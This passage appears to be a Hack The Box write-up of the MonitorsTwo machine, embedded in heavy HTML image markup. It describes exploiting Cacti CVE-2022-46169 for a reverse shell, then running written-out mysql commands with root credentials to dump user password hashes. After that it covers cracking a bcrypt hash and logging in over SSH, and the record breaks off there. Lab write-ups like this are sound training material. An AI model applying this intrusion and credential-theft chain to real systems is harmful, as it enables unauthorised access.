url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAACDUlEQVR42mWS65aaQBCEeZSsclFB5X4bYQDF26q7Me//LJXqwT3JJj/q9IDO19VFW242wiufcKtfCJsHyvaC9vCJqr9ht/9A3lxgBxV+eCneFhmVv2qG+arA7KX5S1ah71DDHak6Qo8E6XdkhASJRhBrZOqEMN9jk/ZY890m7bBN5bcW9jKDs8rh+AVcv4S9KmG1wwN1+45dR0f9HS1diRq+749Pc06qEVl9Rlwc2OBsFJcjgqiFH+4ohXWk4CxTWALL69P0Z9ZcLlQnJLwgZ3nvsPObm2LGMWdS3XiSl3yXE8FSdCZuBFbuLiibKyo2qdqp1nwOswHLjeKlFHNmaLQsJkkTgbmRkaX0zYwWMactcxL5YQPPr7AIatZ6qpRNgORkGxDhxmmCuTTypAkzFCcFR1uuFS+VL0g1iWcZ1+XZMaDcOJoArIuSkMqAvmTp/SczOyJMB5NloS58PqM/PBnFh3EsH2ub9HBXBIs7urEJm3lcmUXxHdj2DzS8kBSjATbdg/WMJB+huFKS7Y7/KdUV7fBpGgahhr/VbLLHOh64f38BJUMBbWTnyuMEoUOpev+T7zuu1c2AOj6vo44uS0YgsSi4gfp/5JQrIsDJ4d1UzXH78YmYThs6/AJKA5eOHGZnRvb+Gbng5Yhr4W8bjnkwqxOzriPN89VkWzVXAxSwRBOErclTcpw+zB/gb6TAhrlo0ZzFAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="root" title="" src="/static/5382eaffe4784e16806fa1d02ef7ee8c/50637/root.png" srcset="/static/5382eaffe4784e16806fa1d02ef7ee8c/dda05/root.png 158w, /static/5382eaffe4784e16806fa1d02ef7ee8c/679a3/root.png 315w, /static/5382eaffe4784e16806fa1d02ef7ee8c/50637/root.png 630w, /static/5382eaffe4784e16806fa1d02ef7ee8c/5176f/root.png 665w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p>https://mgarrity.com/hack-the-box-monitorstwo/https://mgarrity.com/hack-the-box-monitorstwo/Tue, 04 Jul 2023 00:00:00 GMT<p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/4de014213933fb8b1a92ea33e6ef3538/3b67f/monitorstwo.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.67088607594937%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABA0lEQVR42mMQkdX+jxPLAbGM9n9BcR0wDebL4scMuCREgZoFJLT/C8ur/ZczUAXTIL6oHBkGgjQJSmr/VzHV+Z9SGvW/pKTyf0px7H9VUz2wOD5DsbtQBuhFefX/iYUh/3vL2/7nJwf/b87s/59cEfxfSFYNqEaHBAOBtgtJ6PyX1df4X1qe8r9iUsr/tKbA/zFNWf/j8kP/K+rr4HUlTheKKmn+D09x+19fX/F/xvz5/8NqEv8HpTn8F1OARBTJYQiKACVjnf8xOZ7/Kzsz/0fluP1XMdb9LyihRUYYwiIGqFlYTuO/tLY6kNYEWyIiR2aygRkqCooAaWAQyOkQTDIgAwELhgfdWRyoEQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="MonitorsTwo" title="" src="/static/4de014213933fb8b1a92ea33e6ef3538/50637/monitorstwo.png" srcset="/static/4de014213933fb8b1a92ea33e6ef3538/dda05/monitorstwo.png 158w, /static/4de014213933fb8b1a92ea33e6ef3538/679a3/monitorstwo.png 315w, /static/4de014213933fb8b1a92ea33e6ef3538/50637/monitorstwo.png 630w, /static/4de014213933fb8b1a92ea33e6ef3538/fddb0/monitorstwo.png 945w, /static/4de014213933fb8b1a92ea33e6ef3538/3b67f/monitorstwo.png 1232w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>MonitorsTwo is a Linux machine with a web application that uses Cacti, a web based monitoring and fault management framework. The version of Cacti running is vulnerable to arbitrary command injection (CVE-2022-46169) and can be exploited to get a reverse shell within a Docker container. Enumeration of the container can lead to the discovery of password hashes for users on the system, one of which can be cracked and used to SSH into the underlying host machine. An email on the machine mentions a few vulnerabilities that need to be addressed, one of these vulnerabilities (CVE-2021-41091) seems to stand out as it involves exploiting Moby (Docker Engine) to escalate privileges and get a root shell.</p> <p><code class="language-text">nmap</code> scan:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/b3684dcc6ab5885ce49a5e4acdaa649b/c251d/nmap-scan.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.0379746835443%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABoUlEQVR42m2S6W6kMBCEeZKVskNmhnCE0wfG3AwkoNzZzfu/SKXtiSaRdn+U2mrhj+ouO8fqHQf1hn0+ojm94LR9YFr/Qo+PUN0DCr1gH5YXHUIF1xfY+dzKtWIXObJdofoVsrlHVs7g9T2KakHMhjMgUojyDkHWkhpERWf7vz2G3Q3/B+yU7QY9PKKbX6CnZ4zrH5TdZgHm8i2BvVh/AzxuHRpdBxJuQG4DcYE6un9AOz0hEyPCVEPoGUU5kqsWqZwQ88HW0MJ7hNQP0gZ+atz2th4icnzDLNRhNJ6isUvaldR34GqCqCYUogMrJ0hyK5vVrsKoW14JUn87/ikDlPSRIJCpTM0o6zuCz2BiACenrJoRkTOzAuMupz2b83+BJKcenixMkkNugOSGqQVh1tHoC27TCq5XYE8L33k5fl0nuDoWFnhldGTn81fPMRBGf83FCbzaIJrNgrhe7fhGmeipnpAyCipR8GNS2n4FR3ulavbrJzWcpBgoDHoWMYVA0DDrKRDqJQ1JUSjj5aIJKMpquPuYEhb2SZlAzlXRc5L4BMtJJjcnmEQxAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="nmap scan" title="" src="/static/b3684dcc6ab5885ce49a5e4acdaa649b/50637/nmap-scan.png" srcset="/static/b3684dcc6ab5885ce49a5e4acdaa649b/dda05/nmap-scan.png 158w, /static/b3684dcc6ab5885ce49a5e4acdaa649b/679a3/nmap-scan.png 315w, /static/b3684dcc6ab5885ce49a5e4acdaa649b/50637/nmap-scan.png 630w, /static/b3684dcc6ab5885ce49a5e4acdaa649b/c251d/nmap-scan.png 751w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Open ports:</p> <ul> <li>22 (SSH)</li> <li>80 (HTTP)</li> </ul> <p>Visiting the webpage brought up a login form for Cacti:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/4063631092f3b6c42aa9eada8fc8223a/aaaf2/login-page.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 70.88607594936708%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAACUUlEQVR42q3S30uTURzH8SOa0/bsh/vhj81pQkvnzzJNc07rIrKg7rzoNiiF0KKgSLwJE7qwC2/8D+qyCCEowQJTRFIr7YeGxEJDF86BpTOc786etnqaFgQdePGF85zv55zzPI9Q9ln5F3q3Rfrzc6F4bCQyFNsxlmRuo3ii83YMnqjtfVFCKbXzm7JMkgvSEbnJCFfKT0l5sman0NhaSlFzPkl79BjLs0jsF0q53DnGUJFFWomF0+ebabtxhZbONlo726U2WjoucaHrHK13fRzrO0TxqUp0Hovao80QygE5EWOszCalxMzTsSGiY3Nzk/iIbEXU2v3kGj0jN+nu7UEUJGOucqLNEEpVNnGG6hx0+630Dz7E7/cz+WqS+YV5Vr+sshxaljvAwLtH9L9+QOftLoQ7FXNNLtoModTkEGeodaA7aOP+QD8zszNMv5lm9v0scx/m1LoUWCK8FlZPevHWVYQnHXOdC22GUOocxBm8TlKrbdyTgQsLn/B/9LO4uMjKygrBYJBQKEQwFGQrEqE9Glimx+xzoc0QSr18BzEGXy67auw8Hh4kGFhWr/05EOBbeEOebJ2N9TBrX9fUE17u6UBUyMDGfLQZMlAmxxh8Thloo/dOH8+nJng2PsLoizGGJ0YZmfxhaHyYl2+nOHP9LKLSiKnBhTZDBsqvo6Gvlz9xQw7mI05MjQ6cx904m9y4ThSSd7IQR9NeWYuwHnWh92aS2C/09TYSpXstpNVlqHSHzarUWi2TXGNlp14ZmMHfWVRKrP6y83qx22vif/oO0WL9dOkXLDUAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="login page" title="" src="/static/4063631092f3b6c42aa9eada8fc8223a/50637/login-page.png" srcset="/static/4063631092f3b6c42aa9eada8fc8223a/dda05/login-page.png 158w, /static/4063631092f3b6c42aa9eada8fc8223a/679a3/login-page.png 315w, /static/4063631092f3b6c42aa9eada8fc8223a/50637/login-page.png 630w, /static/4063631092f3b6c42aa9eada8fc8223a/aaaf2/login-page.png 828w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The Bottom of the form showed that its built with Cacti Version 1.2.22, so I did a Google search to check for any vulnerabilities and found <a href="https://github.com/FredBrave/CVE-2022-46169-CACTI-1.2.22" target="_blank">this PoC</a> for CVE-2022-46169.</p> <p>CVE-2022-46169 is a command injection vulnerability that allows an unauthenticated user to execute arbitrary code on a server running Cacti by exploiting the <code class="language-text">remote_agent.php</code> file to bypass authentication. This can then be leveraged to trigger an action that executes a PHP script which allows arbitrary strings and can lead to command injection. More detail about the vulnerability on <a href="https://nvd.nist.gov/vuln/detail/cve-2022-46169" target="_blank">NVD</a>.</p> <p>I ran the PoC and caught a shell as <code class="language-text">www-data</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/85cfe82430843b871069047554a8f847/e899a/run-cacti-exploit.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 20.88607594936709%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA1ElEQVR42n2P3XKCMBBGfRYCVEhaSMQEYkiMUsE6o8zY93+Vr2t606tenJn9me/M7oZxjay9IFNfqFTEEBaM0wPj54rj/IQ7r6mvlQfjPYoPi/z9xQAm+lQXzQG5oL7W2Eh7g45PCDOjszOsX6B0gNRHaEezw4JGn8ClT8GSxKUcUbTuVyYd3rqQdqwi4RhXTNdv+NOdBFfYeEfXn7EzEd0wkXBGs48ohUW21WBERkH2hzR/1bWhC/UFvA2oWw+hAqrG0dJQcEfs0xsFvZNzkwL/o/EDMVCASTT5DIEAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="run cacti exploit" title="" src="/static/85cfe82430843b871069047554a8f847/50637/run-cacti-exploit.png" srcset="/static/85cfe82430843b871069047554a8f847/dda05/run-cacti-exploit.png 158w, /static/85cfe82430843b871069047554a8f847/679a3/run-cacti-exploit.png 315w, /static/85cfe82430843b871069047554a8f847/50637/run-cacti-exploit.png 630w, /static/85cfe82430843b871069047554a8f847/e899a/run-cacti-exploit.png 682w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/380c1a3b27266f35791ff751c141369d/50637/www-data-shell.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 31.0126582278481%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABLUlEQVR42lWQ23KCQBBE+RQvkUURI7ALC7hcRDQqJjEVq/L/P9LphSRVeTg18wBnetvxVIdlfocoPrCtP5FWV+z2r8jqHkXTDzPKjlC7F8xWKSZC/jH1FGbL5B+OrnqULQXmxHkbZZSGaYtANtimByTmjHVcQRYnhLobiLMOz8kei3UGsSngEbs75eF9ENhZWbo7DKdp39BeHtifH9DlheIWG9UwbYcoP1J6oLCFH1U8XA9yK2bCKyQ/SJlCMYHd7U82mU1kd5vODXI8rTUWfor5UmHiRpgK4vHpYmR8srlgV9+GdKa5IeeBwvbHaViF5qFT/wXJHrdMFJIgKjFnfyOSxJiLGDMecFxfw+IxwS+CXbg+uwkK7jk2cQN3pfmDGvESSpJRJuSPjLghvgHXucRrXXDNcwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="www-data shell" title="" src="/static/380c1a3b27266f35791ff751c141369d/50637/www-data-shell.png" srcset="/static/380c1a3b27266f35791ff751c141369d/dda05/www-data-shell.png 158w, /static/380c1a3b27266f35791ff751c141369d/679a3/www-data-shell.png 315w, /static/380c1a3b27266f35791ff751c141369d/50637/www-data-shell.png 630w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Listing the files within the <code class="language-text">/</code> directory showed two interesting files: <code class="language-text">.dockerenv</code> and <code class="language-text">entrypoint.sh</code>, indicating that I was within a Docker container:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 504px; " > <a class="gatsby-resp-image-link" href="/static/c138dbedee1228c8e33ef019a3fb3088/0dcb2/dockerenv-entrypoint.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 88.60759493670886%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAASCAYAAABb0P4QAAAACXBIWXMAAAsTAAALEwEAmpwYAAADBklEQVR42m2UaVLbUBCEfZPEgDcsr9r33buNMZBK5f736HQ/DITAjylZ8lNPzzcz6kTZHn68hZ9skFZHuNGKsUaYbrH0Gjjhir/fzmyx8GoMJhFuhx7uRj5uFUMHN/0lw0Ynzg8IKCahINm9ivgNvGgDm78n8xzjWYqBFaHbd96F3uJ24L7GkPfDAB3XONjyZWYehyZ6PDi455UH7niwNwo+HPGq6On5P3FnzlIwr8+oV08IWbo1TzGeZ8apx7KDZI+0OKFsnhDleyz9FlF2YOk7dEchfgw8Ez9NwqugH5NdQXZ0OqGYtcghrgF5CYcQ5PUjMgo7QYukPKPgfwcrwGGR4bhIUZLdcOAZ0U5Gh8362YjM7ALTZYmsekBCsbw6U/SIdvNCl49Q8ig7IuOzE99LeN4j2wUZ9gZXhhJK6NAJVrAIf7IsjDs/ZsnsrJqjBF64xsKtWfoRUbpDxZiR96jnwKK7++HVoZyULbOTmRG0S4irMOTlAxu2Q7N5puMjG9ciZfk13/nD889Riwe3xIllZ/ceunTZUTPESnwkaJGjT1ceHatEuS+bixG22RQ/3tEhq2JzxlaMXt9FXxNgOk3BcnVBu30xovNlbhgWckhHulacgM3ht6nCDZkgPxHBGTk7v6Tjbv9tBq+CyhxnOzicQ2ua0GH+4ZDX+Iok4qw612dutDEIvGDN7fhwZwQrdm/FLqqEObs2tyszJmJoHLYX47CiqJr07rC+4H4Sc0v+E/Q5fz752U5FsdJ00w0ULQU2ZvW0xx7P6X+Nke414FrJL4LKXNNFQKEZN2Vmi6EG+dWhGrLe/0bRnM3wF6yoYUUFnyvZDRl+Eow4cwk77fKDMBFDZtXsyaHPJKlKLE+8X5kvjZiHXD11ezz9xmHOw+KYEf6CDB2ORn7tckmnjk9XZCbHNpOKqfhqnEbfMQzJKSsOxuWcuzmhQ7ETM13lRg1zuNNT7rmEIk6FvpFDK/wqWDJ70/JrwtIlOCUXuVYClSqX7eaX2ZqlWxshjZG+SCMj+JnhX/nlXFJtdPRlAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt=".dockerenv and entrypoint.sh" title="" src="/static/c138dbedee1228c8e33ef019a3fb3088/0dcb2/dockerenv-entrypoint.png" srcset="/static/c138dbedee1228c8e33ef019a3fb3088/dda05/dockerenv-entrypoint.png 158w, /static/c138dbedee1228c8e33ef019a3fb3088/679a3/dockerenv-entrypoint.png 315w, /static/c138dbedee1228c8e33ef019a3fb3088/0dcb2/dockerenv-entrypoint.png 504w" sizes="(max-width: 504px) 100vw, 504px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">entrypoint.sh</code> is a typical script used for setup and configuration of containerized applications. So, I read the script which contained some mysql database commands:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/fd6f1532c07a2337130bd54afa6d2fe0/34428/cat-entrypoint.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 51.89873417721519%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAABvElEQVR42oVS2ZabMBTjTyaZEAhh3zFglgSGJMy0OW0f+v8/osrO5LRP0wedi20hy1fXEO0N/fmOafmFsrkgyc9wQ4lj0MJj9aMebiBhHQX2h5KoYBI7VZ0nBHZ2jlcrghFlJ6TlhEPQ4MXK8LJ/YEvCxnqiwMYuuPesFbYU3GiUGq8U3poUTIszQroasxFrPuKqwO85knhLelz4fSPnRs6SDlh5udoTvLR1Ski3wugKhBQ1vZqCJHSn75j6FZfhA2O94CyvmAiRDGgo1BID9yW56lukI2Qxc01Ub+hYM+7ZbI1x9BvM7J/oVgzzD9T9ByR7Oi4/IXiB4Hpef6M93RFRJCwmePy5Ge8o5Duy5oa4viIlArbPiPisjKSQbiISvbBDEPeIeRjEgw4lyXnOs0dYEo7X6MDChHyeB/EIx5ewvRZGGHVw2AObKR5YFdk+VtizPw7dKxHbrZliwXRLjZ1d6vUDj7X5mb5RsAfD6Rt69jGvFtRyRUrHapxaPrnp37Xr3eGv4FcwlDvXr6HS9um2aq56FpWwenbIZC06/tfhl4Ie50+JWsoB51ANqKmewvnTg+woYvGJ/wv+AQjZQcoJAQ+NAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="cat entrypoint.sh" title="" src="/static/fd6f1532c07a2337130bd54afa6d2fe0/50637/cat-entrypoint.png" srcset="/static/fd6f1532c07a2337130bd54afa6d2fe0/dda05/cat-entrypoint.png 158w, /static/fd6f1532c07a2337130bd54afa6d2fe0/679a3/cat-entrypoint.png 315w, /static/fd6f1532c07a2337130bd54afa6d2fe0/50637/cat-entrypoint.png 630w, /static/fd6f1532c07a2337130bd54afa6d2fe0/34428/cat-entrypoint.png 678w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Running the command <code class="language-text">mysql --host=db --user=root --password=root cacti -e "show tables"</code> in the terminal listed out the tables on the database:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/75d00fb3402a89930ee34b87c5d186f7/51005/show-tables.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 52.53164556962025%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAABoElEQVR42n2S6XLaMBSF/SjEGGxIbGwLb3hfsB0CtJDMtO//IqdHcjMtWfhxRjMa6bvfvZJW7a9I6xP8uEOUHxCkA4JshBu1cMMWIunhbCtskz0E99ZuCj9qVBxRwBYlnvwSa6+AR4aWEZZIEC84ooIXtLB5YOWkeOQh82mn9m2f4TpfhZgtBePjgZktXMyMzbQuPWj94RekZTO8ouy49ldE6TMNOhi8PF9F0K0AurlVgLkpPof7OoG64UAbj79R9a8EviHODgh3I4EjPLargFYI4z1/C6ioIgK6gnlTpOHwMhnWhGbVkcABj5uMlQNCIkJuI0HSaMpWFZxbskjMJNC68Q158wMtW84J9MMODue14IFbEC+ybVlIAawJMIGmSFut5czy5oyCUJ8P4kd7Gha3ZtJUtS3XeIJZ8Q1MFtQXGwmkWX1G2f5EVp5ge5Uy/Af6mK+AibJXM2zV7M6ouwu/zoDlOsHDQvxn9BlofGVo0pDfR+sGCTyp75IT7Ioa5jr+BnYHKGfIl9aa/QW74qCgaXmkZQ/bLe4A78xxFeMPxPRdbQ06sNQAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="show tables" title="" src="/static/75d00fb3402a89930ee34b87c5d186f7/50637/show-tables.png" srcset="/static/75d00fb3402a89930ee34b87c5d186f7/dda05/show-tables.png 158w, /static/75d00fb3402a89930ee34b87c5d186f7/679a3/show-tables.png 315w, /static/75d00fb3402a89930ee34b87c5d186f7/50637/show-tables.png 630w, /static/75d00fb3402a89930ee34b87c5d186f7/51005/show-tables.png 675w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Of the listed tables, <code class="language-text">user_auth</code> seemed to be a likely candidate for user credentials:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 358px; " > <a class="gatsby-resp-image-link" href="/static/c62a3436b32ba56ac00a4c30fa56aa8f/46af1/user_auth.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 62.65822784810127%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAABgUlEQVR42o2S226CQBCGeZNGBTxrK0cBgRWWk+eqre2Vff+H+Du7qU3aSORikt25+PLNP6NcowqfRogvP8PVYUhaY6iDOfSeA7VrQ+3dK6e2lFO6R+mmOLANNkGJyCvA+Cssh6OlGuh0LVmNgSw7wvJLLJIDvHgH8ef5GS71ugMXw8kCg0kAre80giop2cyF1XKPMN4goX/Cj/TeIs1PqNYfWFC/P/b/mdYBycj1C8RkKCAJ/QUwWu6wJHhevWM6i9HSDLJsaOh6OQH3ZLIFSw/gxRneYgXT5vCCFUbTEG3dbLQcaTj3BXCHINogZFsUq4vM8KnzgrZmoqNbjTeucAJ6tF1OeQmYyMt2M/RHvoRpt/O51QPoj2GBvDwjo1FFltMZkyOL7AT0D/ABVOH5UWZYUvh+UMkzGT2HMOkORXa/4zaEKtX6AsNkGNGt9QYO2upMQsRRt7UaWC3QhlJUb7TNBDYZMdr0cOxB1e9k1xAqM4zp5kQJS52aWtd6DKuBfgM2gKAcvcPN3wAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="user_auth" title="" src="/static/c62a3436b32ba56ac00a4c30fa56aa8f/46af1/user_auth.png" srcset="/static/c62a3436b32ba56ac00a4c30fa56aa8f/dda05/user_auth.png 158w, /static/c62a3436b32ba56ac00a4c30fa56aa8f/679a3/user_auth.png 315w, /static/c62a3436b32ba56ac00a4c30fa56aa8f/46af1/user_auth.png 358w" sizes="(max-width: 358px) 100vw, 358px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>So, I retrieved all the rows from the <code class="language-text">user_auth</code> table with the command <code class="language-text">mysql --host=db --user=root --password=root cacti -e "select * from user_auth;"</code>. This revealed usernames and password hashes:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/36c020cf7bee9db14f133c0fb76f0c25/ae072/select-user_auth.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 44.93670886075949%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB00lEQVR42j1SWZLaQAz1UZKaCXhrG2y8L+023jBgYJia+9/k5XWnKh8qCUmtt2ArLWfI8xPD/I1WbThP34jTAXE2Qhw7ROmIQ9ybSPIZfigRRIr9CYLZjzq4BwknaOCFFawoPSOrLpD9w4Q4tHCDGpW8oek2LrVIihm1vBuQiGBh1OPTzuEfFQSB4nxi3fG4ghUSIYgkmv4JNXwhLRccswFqeqPq7kjKC07FYuaSc8H9mEzl8Ebe3vHHq1B0D6jlx+xYx5OC5xVYyWioFtyHF57zG9v8haldcaUds2ZLJTqPzRULgcZ6RcnjSdCiSaiSTA3DKOmRnXo8qhmtKLHmI17dDUs+YGsuuLGvaIMMa5ypRB0ajCTR8beue0qd+D5yciqbYZ2InOT/DN65BTwa7OvgY4+HPpwMn06B3/sUe1HDoacu+zbrX7vkf//DLRGQpeX4BXb7BAUPB36JE2WksUJ8lKZ2eTBmFrQl4iEdun8IGwju++zrbHNPE7ECPoyCCluqoJgf/Ix++g1bMeJJT18NfS0nzJS5MEYyX/mnTXGHG21ZGffsjFwDUqmVcFi3VyI3sMlUeKQuKiLrXJvatlMzM9nOTOwpVXCua727o4f6u/0LfAIs75HLEYgAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="select * from user_auth" title="" src="/static/36c020cf7bee9db14f133c0fb76f0c25/50637/select-user_auth.png" srcset="/static/36c020cf7bee9db14f133c0fb76f0c25/dda05/select-user_auth.png 158w, /static/36c020cf7bee9db14f133c0fb76f0c25/679a3/select-user_auth.png 315w, /static/36c020cf7bee9db14f133c0fb76f0c25/50637/select-user_auth.png 630w, /static/36c020cf7bee9db14f133c0fb76f0c25/ae072/select-user_auth.png 679w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Two of the hashes were prefixed with <code class="language-text">$2y$</code> which indicated that they were <code class="language-text">bcrypt</code>.</p> <p><code class="language-text">JtR</code> cracked one of the hashes after about five minutes which allowed me to log in over SSH as the user <code class="language-text">marcus</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 627px; " > <a class="gatsby-resp-image-link" href="/static/3516159d643b2be13a7bd2935555689c/c700b/cracked-hash.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 25.949367088607595%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsSAAALEgHS3X78AAABEklEQVR42kWQV3KDQBBEdRVlkZMISxIgQAHJErbLvv9JnseUw8erqd7a6erp2copWQQD2+QVIxpw4pq0vqGOLxT9k/L0RiI6Fb3xCpaWYmWlgmJp/mAkLLRwYuZnA/tqpDh90l4+qLoRVQ1kp5G0e6LaB35xxlItelQLDdq+wghr7LRDl6kHBzQ3Z+ekzPLmQVoOxMWV5vxOXt0o25GkvAoDgeqJsjN+0qJER9mFrLljeCVO2GD6BwzBCip0MZ3lkkblPUnWU3ybH67ktSSs79NHN26xZdHe1/iqk0qOWJLKkpSmmMx3IXMtmuZ08rF74LgJrivd6DE76cbzFaaXs5Z+NtLXL+sJ9fe+tVOWsvNPxBdCHKVglFiOvQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="cracked hash" title="" src="/static/3516159d643b2be13a7bd2935555689c/c700b/cracked-hash.png" srcset="/static/3516159d643b2be13a7bd2935555689c/dda05/cracked-hash.png 158w, /static/3516159d643b2be13a7bd2935555689c/679a3/cracked-hash.png 315w, /static/3516159d643b2be13a7bd2935555689c/c700b/cracked-hash.png 627w" sizes="(max-width: 627px) 100vw, 627px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; 